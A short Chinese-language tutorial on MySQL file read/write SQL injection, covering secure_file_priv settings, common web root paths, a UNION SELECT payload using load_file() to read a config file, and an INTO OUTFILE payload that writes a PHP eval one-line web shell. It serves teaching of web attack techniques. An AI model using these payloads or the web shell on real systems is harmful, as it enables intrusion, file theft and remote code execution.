SQL注入篇——文件读写注入

文件读写注入的原理

就是利用文件的读写权限进行注入，它可以写入一句话木马，也可以读取系统文件的敏感信息

文件读写注入的条件

1、读写文件需要secure_file_priv权限

1. secure_file_priv=
   代表对文件读写没有限制
2. secure_file_priv=NULL
   代表不能进行文件读写
3. secure_file_priv=d:/phpstudy/mysql/data
   代表只能对该路径下文件进行读写

2、知道网站绝对路径

Windows常见：

Phpstudy    phpstudy/www  
            phpstudy/PHPTutorial/www 
Xampp       xampp/htdocs                   
Wamp        wamp/www 
Appser      appser/www 

Linux常见：

/var/mysql/data      /var/www/html

读取文件

使用函数：load_file()

注入语句：

id=-1' union select 1,load_file('C:\\phpStudy\\PHPTutorial\\MySQL\\my.ini'),2 -- -

效果如图：

写入文件

使用函数：Into Outfile（能写入多行，按格式输出）和into Dumpfile（只能写入一行且没有输出格式）
注入语句：

1')) union select 1,'<?php eval($_REQUEST[23]); ?>',3 into outfile 'D://1.php' -- -

效果如图：

查看D:盘下是否出现1.php文件